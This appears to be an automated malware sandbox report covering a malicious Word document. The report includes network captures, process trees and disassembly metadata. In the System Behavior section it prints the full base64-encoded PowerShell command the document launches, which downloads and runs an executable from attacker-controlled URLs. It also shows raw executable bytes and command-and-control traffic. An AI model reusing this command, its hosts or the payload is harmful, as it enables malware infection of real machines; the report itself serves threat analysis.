Feb 12, 2019 20:13:01.956264973 CET	218	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 12 Feb 2019 19:13:01 GMT Server: Apache Location: http://borsacat.com/9onrkqJ/ Content-Length: 236 Keep-Alive: timeout=5, max=150 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 6f 72 73 61 63 61 74 2e 63 6f 6d 2f 39 6f 6e 72 6b 71 4a 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://borsacat.com/9onrkqJ/">here</a>.</p></body></html>
Feb 12, 2019 20:13:01.958029032 CET	218	OUT	GET /9onrkqJ/ HTTP/1.1 Host: borsacat.com
Feb 12, 2019 20:13:02.006755114 CET	219	IN	HTTP/1.1 200 OK Date: Tue, 12 Feb 2019 19:13:02 GMT Server: Apache X-Powered-By: PHP/5.6.37 Expires: Tue, 01 Jan 1970 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Pragma: no-cache Content-Disposition: attachment; filename="lmZBvQit.exe" Content-Transfer-Encoding: binary Last-Modified: Tue, 12 Feb 2019 19:13:02 GMT Vary: Accept-Encoding,User-Agent Transfer-Encoding: chunked Content-Type: application/octet-stream Data Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 da 9c a8 14 9e fd c6 47 9e fd c6 47 9e fd c6 47 97 85 55 47 91 fd c6 47 9e fd c7 47 86 fd c6 47 9e fd c6 47 9f fd c6 47 93 af 1d 47 9f fd c6 47 93 af 18 47 9f fd c6 47 52 69 63 68 9e fd c6 47 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e0 a9 a7 30 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 05 00 00 40 00 00 00 00 00 00 00 a0 01 00 da 22 00 00 00 10 00 00 00 e0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 06 00 00 00 06 00 00 00 06 00 01 00 00 00 00 00 00 60 03 00 00 10 00 00 00 00 00 00 02 00 41 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 c0 57 00 00 48 00 00 00 94 d7 01 00 a0 00 00 00 00 10 02 00 50 3d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 03 00 9c 04 00 00 80 40 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 2b 00 00 00 10 00 00 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e1 5e 00 60 2e 72 64 61 74 61 00 00 da 9a 01 00 00 40 00 00 00 a0 01 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 30 23 00 00 00 e0 01 00 00 10 00 00 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 ea 00 c0 2e 76 30 00 00 00 00 00 50 3d 01 00 00 10 02 00 00 40 01 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 9c 04 00 00 00 50 03 00 00 10 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$GGGUGGGGGGGGGGRichGPEL0@"@`AWHP=P@8@\|.textd+0^`.rdata@@@@.data0#.v0P=@@@.relocP0@B
Feb 12, 2019 20:13:02.006795883 CET	220	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Feb 12, 2019 20:13:02.006824970 CET	222	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Feb 12, 2019 20:13:02.006850958 CET	223	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Feb 12, 2019 20:13:02.006876945 CET	224	IN	Data Raw: 19 f7 89 4c 24 20 89 5c 24 08 89 7c 24 04 73 82 eb 00 b8 46 53 4b 59 2b 44 24 3c 8a 4c 24 3b 80 f1 57 8b 54 24 20 89 54 24 34 8b 54 24 34 8b 74 24 10 8a 2c 16 03 44 24 34 89 44 24 20 38 cd 0f 84 7a ff ff ff eb cb 55 89 e5 53 57 56 83 ec 28 8b 45 Data Ascii: L$ \$\|$sFSKY+D$<L$;WT$ T$4T$4t$,D$4D$ 8zUSWV(EMUu}9WE=W!+]]]EE*I9}MUutFEH<U$ut$L$EMAQuq$t$T$h(^_[]E5=W!M9tU@ff
Feb 12, 2019 20:13:02.006905079 CET	225	IN	Data Raw: 81 c3 55 81 9b ab 29 c2 66 89 7d e8 89 e0 8d 7d e8 89 78 10 89 50 0c 89 70 04 89 18 c7 40 08 0b d7 41 00 a1 38 40 40 00 89 4d e0 ff d0 83 ec 14 b9 93 dd 1c 00 89 e2 c7 02 93 dd 1c 00 8b 15 24 40 40 00 89 45 dc 89 4d d8 ff d2 83 ec 04 8b 0d 14 40 Data Ascii: U)f}}xPp@A8@@M$@@EM@@EE8^_[]UV0EEE4EE(@@El@@EU9u8Eu+E,@@EU`@@E+U5d@@EMU
Feb 12, 2019 20:13:02.006933928 CET	227	IN	Data Raw: 34 83 c4 08 5e 5d c3 55 89 e5 53 57 56 83 ec 54 8b 45 08 c7 45 f0 6a ae 5c 6d c6 45 ef 79 89 45 e8 e8 7e 0e 00 00 8b 4d f0 89 c2 89 14 24 89 45 e4 89 4d e0 89 55 dc e8 99 0d 00 00 31 c9 8b 40 78 8b 55 dc 01 c2 8b 75 e0 81 f6 6a ae 5c 6d 8b 7d e4 Data Ascii: 4^]USWVTEEj\mEyE~M$EMU1@xUuj\m}\}EEMM\| 9uU}]ut1:EM1u}4EMuUhEET^_[]1MUJ$EME4yMUe8] J\mQu
Feb 12, 2019 20:13:02.006968021 CET	228	IN	Data Raw: 25 8a 5d f1 80 c3 db 88 5d df 8b 7d ec 81 f7 fa ea c9 25 89 7d d4 2b 75 ec 89 75 bc 89 45 ac 89 4d a8 89 55 a4 eb 0e 8b 45 e0 8b 4d d0 89 45 c4 89 4d d8 eb 2f 8b 45 bc 89 45 c8 8b 45 d4 89 45 e0 8b 45 c8 0f b6 04 05 f3 cf 41 00 89 45 d0 8b 45 d0 Data Ascii: %]]}%}+uuEMUEMEM/EEEEEAEEMMM9rM46UEeUUUu}];}MM%!M6eE1MMM9GTA}<2}M]M}8s\^_[]EM
Feb 12, 2019 20:13:02.006985903 CET	229	IN	Data Raw: 8b 75 fa 66 81 f6 5f 9d 66 39 f0 89 4d c8 77 70 eb 6e 83 c4 44 5e 5d c3 8b 45 d0 8b 4d f4 81 c1 bb ba f1 8e 39 c8 77 3d eb 2a 8b 45 cc 8a 4d f3 80 c1 3c 89 45 d0 8b 45 d0 8b 55 d0 8b 75 f4 81 f6 46 45 0e 71 01 f2 8a 6c 05 d5 89 55 cc 38 cd 74 c6 Data Ascii: uf_f9MwpnD^]EM9w=*EM<EEUuFEqlU8thAh$ED$hAAGEqU+MWEqu4$D$T$MaEErUVEHEAEMduA9DB0^]
Feb 12, 2019 20:13:02.007011890 CET	230	IN	Data Raw: 8a 5c 08 03 8a 7c 24 1f 80 f7 c3 38 fb 89 74 24 0c 89 54 24 08 74 3c eb 1e 31 c0 b1 08 2a 4c 24 1f 8b 54 24 08 38 4a 01 8b 74 24 0c 0f 44 c6 8d 65 f4 5e 5f 5b 5d c3 31 c0 8d 65 f4 5e 5f 5b 5d c3 8a 44 24 1f 8b 4c 24 08 8a 11 34 93 38 c2 74 26 eb Data Ascii: \\|$8t$T$t<1*L$T$8Jt$De^_[]1e^_[]D$L$48t&D$ L$$5iT$t$)D$$rD$HT$=8tUSWVAMUfEtCEK`E}A$D$\|$uMU1MUE\|xtL
Feb 12, 2019 20:13:02.038960934 CET	232	IN	Data Raw: e4 89 4d b8 8b 4d b8 83 c1 24 89 4d 98 3a 45 9f 0f 87 73 ff ff ff eb 3d 66 b8 20 b5 8b 4d e0 66 8b 55 c2 66 2b 45 ee 89 4d cc 66 39 c2 74 bc eb 5e 8b 45 a0 8b 4d d4 8b 55 d4 8b 75 e0 89 55 ac 89 75 cc 39 c1 0f 82 d3 00 00 00 eb 9e f6 45 d3 01 75 Data Ascii: MM$M:Es=f MfUf+EMf9t^EMUuUu9Eu<zEffME@(EE@EE9E"Uu,EE\EMEE9BKEEEMWaM;EsjfEfJfMfMffEffuf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.1.16	49236	181.15.224.57	80	C:\Windows\System32\startedradar.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2019 20:14:33.609991074 CET	462	OUT	GET / HTTP/1.1 Cookie: 55193=HoTC9DGe9+F8n6zBTTuy+GWHm63lQSxcmAlGva3Kao04L64CnsGpcFMQIpsoIeOaWtHQuDMyxaXSDx1wPhNwdOm3OEfCNoSKj9RgMXnR3WTr+QwWzfnMGmbSg9hdXtbVDOmnf7WTrIDGPrSXQxJgUyScIjhAKBaaJC/11D+B+Y9jm379ECkn78pv6/zOXqZ/1oYa+5OLkVkU0lqyuBaiY2a0PDmNKWybkJPv7DhC/8qnKqUOrKKvCbTJSTXugxvsqoGHX7vUeSuyFaVfDTThr6ToCd9mmlS6Gy1PvZJKfMunlupwXJ6GASeAuCeUy3/pD2ez2xZDOO2P87McYuTRMr1S6bl7OkfQ6fVVO8nAG8pOfMuJI9zARL54B7LfNoaZx5LhOl4RV0Qi/6mrfmVbSz+HX5hnU66i8oLMzRBbcmbJAfpe User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 181.15.224.57 Connection: Keep-Alive Cache-Control: no-cache
Feb 12, 2019 20:14:44.746947050 CET	463	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Feb 2019 19:14:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 132 Connection: keep-alive Data Raw: b7 65 5c 7c a1 e6 18 25 5b c1 8a 83 ad d8 f1 b6 bc ca b8 c7 7c 55 e1 77 59 34 05 ac dc 12 43 2a f0 ab 6e 69 6e 7b 62 a0 d3 16 e3 29 1f 98 49 a4 11 19 d7 98 64 78 bc 74 3f f7 4c c5 bb d8 78 8f e1 31 fb 47 ee 91 1f f1 74 b5 d5 30 7e ce d5 86 08 00 9e 2e b9 b8 fb a5 8a 13 87 b4 40 14 2a 00 78 63 e0 c7 31 a5 dd f1 f4 55 30 e4 67 f7 ab f2 c6 68 a2 26 48 1f 40 ce d9 00 da b0 1d 8d 8e 73 7a 77 37 81 Data Ascii: e\\|%[\|UwY4Cnin{b)Idxt?Lx1Gt0~.@xc1U0gh&H@szw7

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 12, 2019 20:12:36.409452915 CET	184.175.67.101	443	192.168.1.16	49225	CN=leonfurniturestore.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Sat Sep 15 19:24:10 CEST 2018 Tue May 03 09:00:00 CEST 2011	Sun Sep 15 19:24:10 CEST 2019 Sat May 03 09:00:00 CEST 2031	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Feb 12, 2019 20:12:36.409452915 CET	184.175.67.101	443	192.168.1.16	49225	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031		7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: iexplore.exe PID: 2320 Parent PID: 532

General

Start time:	20:12:32
Start date:	12/02/2019
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x8e0000
File size:	815312 bytes
MD5 hash:	EE79D654A04333F566DF07EBDE217928
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: iexplore.exe PID: 2656 Parent PID: 2320

General

Start time:	20:12:33
Start date:	12/02/2019
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2320 CREDAT:275457 /prefetch:2
Imagebase:	0x8e0000
File size:	815312 bytes
MD5 hash:	EE79D654A04333F566DF07EBDE217928
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: WINWORD.EXE PID: 1404 Parent PID: 2320

General

Start time:	20:12:51
Start date:	12/02/2019
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\eFILE_201902123164.doc
Imagebase:	0x2fad0000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 3392 Parent PID: 1404

General

Start time:	20:12:52
Start date:	12/02/2019
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJwBqAFAAOQB2AFAAJwArACcAMAAzACcAKQA7ACQATwBIAFIAMgBwAGgAUwBYACAAPQAgACgAJwA4ADEAJwArACcAMAAnACkAOwAkAFUAcwBZAEkAUQBLAD0AKAAnAGMAMQAwAEYAJwArACcASQB0ACcAKQA7ACQAUwBOAFAAdwBaAGYAdwBaAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAEgAUgAyAHAAaABTAFgAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABtAGgAMQBhAHoAUwBQAHEAIABpAG4AIAAkAFYAUABpAFoAVQBUAFgAKQB7AHQAcgB5AHsAJABJAEEAOQA1AFkAOAA4ADEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbQBoADEAYQB6AFMAUABxACwAIAAkAFMATgBQAHcAWgBmAHcAWgApADsAJAByAFMAOQBuAGgAdQBxAD0AKAAnAHUAVgAnACsAJwB6ADYAbQBRACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAFMATgBQAHcAWgBmAHcAWgApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAFMATgBQAHcAWgBmAHcAWgA7ACQAdQB0AGIAdgBVAHcAPQAoACcAaQBxADgAZABqAEcAJwArACcAUAAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASABqAHoARwByAG4AQgAwAD0AKAAnAHIAJwArACcAWABTADYAawAnACsAJwBqAHoAJwApADsA
Imagebase:	0x21a70000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: 810.exe PID: 1512 Parent PID: 3392

General

Start time:	20:13:04
Start date:	12/02/2019
Path:	C:\Users\user\810.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\810.exe'
Imagebase:	0xd00000
File size:	212992 bytes
MD5 hash:	62C4B4A53927329BBBD9B78DE6E2FC01
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 810.exe PID: 3520 Parent PID: 1512

General

Start time:	20:13:04
Start date:	12/02/2019
Path:	C:\Users\user\810.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\810.exe
Imagebase:	0xd00000
File size:	212992 bytes
MD5 hash:	62C4B4A53927329BBBD9B78DE6E2FC01
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: startedradar.exe PID: 3784 Parent PID: 408

General

Start time:	20:13:15
Start date:	12/02/2019
Path:	C:\Windows\System32\startedradar.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\startedradar.exe
Imagebase:	0xd00000
File size:	212992 bytes
MD5 hash:	62C4B4A53927329BBBD9B78DE6E2FC01
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: startedradar.exe PID: 3444 Parent PID: 3784

General

Start time:	20:13:17
Start date:	12/02/2019
Path:	C:\Windows\System32\startedradar.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\startedradar.exe
Imagebase:	0xd00000
File size:	212992 bytes
MD5 hash:	62C4B4A53927329BBBD9B78DE6E2FC01
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 810.exe PID: 1512 Parent PID: 3392 810.exeUNIQUE

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	91.4%
Signature Coverage:	7.4%
Total number of Nodes:	488
Total number of Limit Nodes:	9

Executed Functions

Function 003E21B8, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 60
memorynativeCOMMON

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL ref: 003E2261

Strings

l, xrefs: 003E2219
y, xrefs: 003E2205
YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY, xrefs: 003E21CD
w, xrefs: 003E2211
l, xrefs: 003E2221
A, xrefs: 003E2215
l, xrefs: 003E221D
r, xrefs: 003E2201
Z, xrefs: 003E220D
$, xrefs: 003E21E5

Memory Dump Source

Source File: 00000006.00000002.1665362064.003E0000.00000040.sdmp, Offset: 003E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3e0000_810.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID: $$A$YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY$Z$l$l$l$r$w$y
API String ID: 2167126740-65669930
Opcode ID: f9959c93a941151077e1a9aab2dcafdf21ccc83830e5b6233c06f02f7e972a3d
Instruction ID: e879848a459bcfdd708901c0901264d0ad95a24b03d0cb69bc4a29de185d0c49
Opcode Fuzzy Hash: f9959c93a941151077e1a9aab2dcafdf21ccc83830e5b6233c06f02f7e972a3d
Instruction Fuzzy Hash: 722119B0908388DFDB00DFA9D48468EFFF1AF85314F10851EE898AB391C3759949CB92

Uniqueness

Uniqueness Score: 3.75%

Function 003E20FD, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 61
nativeCOMMON

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 003E21A2

Strings

@, xrefs: 003E212A
M, xrefs: 003E2152
yyProtectairtual emory, xrefs: 003E2112
w, xrefs: 003E214A
V, xrefs: 003E214E
Z, xrefs: 003E2146

Memory Dump Source

Source File: 00000006.00000002.1665362064.003E0000.00000040.sdmp, Offset: 003E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3e0000_810.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: @$M$V$Z$w$yyProtectairtual emory
API String ID: 2706961497-3039725267
Opcode ID: 3f677eae17c12eccc1d78efb5663cf388eb09df8bae21c23f9d6a73637d59adc
Instruction ID: 95eac2aeef1cd4e85dec02233ea8127fc28a6f8134a326f98b8c1832e4136708
Opcode Fuzzy Hash: 3f677eae17c12eccc1d78efb5663cf388eb09df8bae21c23f9d6a73637d59adc
Instruction Fuzzy Hash: CE21E9B0D043989FDB00DFA9C48069EBBF4EF48354F10892EE959AB391D3759945CF51

Uniqueness

Uniqueness Score: 3.75%

Function 00D0332D, Relevance: 4.6, APIs: 3, Instructions: 127
timeUNIQUE

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32 ref: 00D03392

Part of subcall function 00D015F6: GetTopWindow.USER32 ref: 00D01685

GetTimeZoneInformation.KERNELBASE ref: 00D03423
IsTokenRestricted.KERNELBASE ref: 00D0348F

Part of subcall function 00D0257B: RemoveFontMemResourceEx.GDI32 ref: 00D02612
Part of subcall function 00D0257B: AllocateUserPhysicalPages.KERNEL32 ref: 00D0266F

Memory Dump Source

Source File: 00000006.00000002.1665965007.00D01000.00000020.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000006.00000002.1665960258.00D00000.00000002.sdmp Download File
Associated: 00000006.00000002.1665970652.00D04000.00000002.sdmp Download File
Associated: 00000006.00000002.1665987296.00D1E000.00000004.sdmp Download File
Associated: 00000006.00000002.1665992596.00D21000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d00000_810.jbxd

Similarity

API ID: AllocateFontInformationPagesPhysicalRemoveResourceRestrictedTimeTokenUserVersionWindowZone
String ID:
API String ID: 3655130047-0
Opcode ID: 7f1a4d8d2e4c2fa0470b2cd61d687675d22dc41c455000e0a7abba1671b2c2a3
Instruction ID: 8b7c5784fc6f692facf3be33b0d34eaefb90550731cb6531bbf004113b41c8c5
Opcode Fuzzy Hash: 7f1a4d8d2e4c2fa0470b2cd61d687675d22dc41c455000e0a7abba1671b2c2a3
Instruction Fuzzy Hash: 495123B5A093808FC724DF69E590A9EBBF1EBC9300F04891EE9D897351D770D915CBA2

Uniqueness

Uniqueness Score: 100.00%

Function 00401BF0, Relevance: 1.5, APIs: 1, Instructions: 8
processCOMMON

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00401BF4

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 1689942d9e72f23815cf851b954ffe060e86949cba8f1da58a2f9d5ff9540f8a
Instruction ID: e89c66d01c7d2f947e0c0a32edea4a38161e9f2b1efdbf4bcfbce8fce607b621
Opcode Fuzzy Hash: 1689942d9e72f23815cf851b954ffe060e86949cba8f1da58a2f9d5ff9540f8a
Instruction Fuzzy Hash: 5CB09B317445308783287538154C0A451C015893703A98737DD7B972F2957D8C8B144A

Uniqueness

Uniqueness Score: 0.01%

Function 00D03535, Relevance: 1.5, Strings: 1, Instructions: 208
UNIQUE

Control-flow Graph

Executed
Not Executed

Strings

97, xrefs: 00D03550

Memory Dump Source

Source File: 00000006.00000002.1665965007.00D01000.00000020.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000006.00000002.1665960258.00D00000.00000002.sdmp Download File
Associated: 00000006.00000002.1665970652.00D04000.00000002.sdmp Download File
Associated: 00000006.00000002.1665987296.00D1E000.00000004.sdmp Download File
Associated: 00000006.00000002.1665992596.00D21000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d00000_810.jbxd

Similarity

API ID: AllocBinaryTypeVirtual
String ID: 97
API String ID: 2154808983-4158667338
Opcode ID: bc70d3f47f83099a20a853e3e75727aa852ddb429a51a53f2c6456d9b15b5a92
Instruction ID: 3d3abe708aa672fa9d329696ca19e625fee8f47b872bafd54850628bb3f63592
Opcode Fuzzy Hash: bc70d3f47f83099a20a853e3e75727aa852ddb429a51a53f2c6456d9b15b5a92
Instruction Fuzzy Hash: 79A1A0B56087808FD324CF29C580A5AFBF1BFC8714F55892EE9D997351DA30A8058F96

Uniqueness

Uniqueness Score: 100.00%

Function 00D013D2, Relevance: .1, Instructions: 51COMMON

Memory Dump Source

Source File: 00000006.00000002.1665965007.00D01000.00000020.sdmp, Offset: 00D00000, based on PE: true

